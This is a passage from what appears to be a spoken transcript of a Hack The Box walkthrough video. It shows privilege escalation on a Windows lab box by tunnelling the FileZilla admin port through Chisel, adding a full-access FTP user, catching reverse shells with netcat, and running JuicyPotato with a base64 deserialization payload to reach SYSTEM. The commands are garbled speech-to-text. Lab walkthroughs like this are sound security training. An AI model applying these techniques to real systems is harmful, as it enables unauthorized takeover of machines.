wanted was this interface. So this is how FileZilla manages itself. They have a server. It starts up a admin server on port 14147, only accessible to localhost. We forwarded localhost from the server all the way to our box, so now we can access JSON's localhost 14147 port. So if I click connect, it'll go through this proxy, end out on this proxy, and then access localhost on JSON, which is what just happened. So I click this users tab, and maybe that's not what just happened. Exit. I really hope it just didn't kill my port. CMD netstat al or an find string 14147. Listening. I saw FileZilla open there, so let's try this again. Server interface. Localhost 14147. Shared folders. We should see users. Okay, so better idea. Let's get this shell again, nclvnp 9001, and instead of doing 14147, let's do 14148. cd users public music, because what I think is happening is every time I start this FileZilla thing up, it is killing whatever's listening on this port and then listening again. So 10, 10, 14, 2, 8000, 14148, 127.0.0.1, 14147. So this will connect back to us. I'm going to restart this real quick. So it's going to connect back to us, take whatever's, or once it connects to us, it's going to have us listen on 14148, and anytime we connect to it, it's going to send it back through Chisel and end up on 14147. At least that is the plan. So now we just redirected. We can see proxy 1, 14148 is directed to 14147. So server interface, 14148, click connect, click users, and here we go. So that was the issue. Because I installed FileZilla Server, every time I opened this, it started hijacking that port and we didn't get through. So we can see the user super admin here, group membership and stuff, and we can see this share folder. So we could add a new share folder to just be C and add a new user. Let's see, remove, add, PSEXEC should be a member of no group, that's fine. The directory is going to be C. He can do everything he wants to see. And then general, enable account, password is going to be password. Click OK. So now if I open up CMD, FTP 10.10.14.2, IPSEC, did I say please subscribe or password? Password? Quit, FTP 10.10.14.2. Let's just change his password to be IPSEC. So username IPSEC, password IPSEC. IPSEC, IPSEC. Incorrect. Why is this incorrect? General, C, read, write. Set as home. Copy. Test. Directories. C:. Let's try this. And test should have that password. That's fine. Exit. Quit. Test. Funny HTB. Quit. User. It's going to be super admin. FUNNY HTB. Oh crap. 10.10.10.156 or 158. IPSEC, IPSEC. There we go. So now I can access the server C drive. So we could edit any file we want. So you can see we can get into super admin and do this. So that is the second way to do this box. The third and final way is back on Kali. So let's do that and do the hot potato or juicy potato method. Hopefully that goes smoother than this one because this one was painful. Exit, sure. There we go. Root. Let's start OpenVPN back up. And we'll have to get a shell, but that shouldn't be too tough, as we just have to forward a request in burp. So I'm going to listen on port 9001, go over to burp, send the request, and we should get a shell. And then with this shell, let's just mount our drive. So please subscribe, convert to secure string as plain. I don't think I need text. I think I can just do as plain. Maybe not. Wait. I did not do the quote right. Copy, paste. Copy, paste. There we go. That's fine. Next thing we need to do is create the credential object. So cred equals new object. System management automation. PS credential. IPSEC pass. It's right about this time I'm regretting putting a password on my SMB server, but it's for the better. New PS drive name. IPSEC root 10.10.14.2. Patreon rocks. Credential. Cred -PS provider. File system. CD IPSEC. Sweet. So now we're here. We can download Juicy Potato. So GitHub, Juicy Potato. And if we go to releases, we can download juicypotato.exe and move it in our SMB folder. So MV downloads Juicy Potato. I'm just going to name it jp.exe to make it easy to execute. So if we do jp.exe, it should output how to use it. And while we're here, let's go cat deserialize runme.ser, and I just want to copy this base 64. Actually, we can copy this whole thing. And then v run.bat, paste this, cmd/c for good measure. Should be fine. Copy run.bat to c:users public music run.bat. Okay. So Now I can do ./jp.exe, and we need the create process. Stir does them both, so I'm going to do stir -p for program. We're going to do users public run.bat -l. This can be any port. I'm going to do 9001. Actually, we'll delete. If we keep reusing 9001, eventually that's going to get confusing for some people. And then, let's see. What else do we need? We may need to do the CLSID, but maybe not. NC LVNP 9001. Go to servers. I'm going to clear and start this up so we know if we hit it. What happens if I just run this now? We magically can get a shell. Go back to servers. Don't have anything. And we failed. So maybe it doesn't like this CLSID. So let's pick a different one. Okay. Let's go to page again. Where is his post? CLSID. Here's a thing that says interesting CLSIDs, 2012 data center, and oh, come on. Why is this not saying system? Is there a better page for this? Let's see. Here, CLSID, data center. Okay, so now we can see system. So let's try the first WUA serve. -c, paste. The next one we'll try is when management. Not like that. Wrong argument. -c. Put this in quotes, maybe? Okay, there we go. So I wanted that in single quotes. But here we go as anti-authority system. So now we have a shell as the system user. If we go to super admin, cd desktop, and we can get root.txt. So that is a bunch of ways to do this box. And the conclusion of the video. Hope you guys enjoyed it. Take care, and I'll see you next week.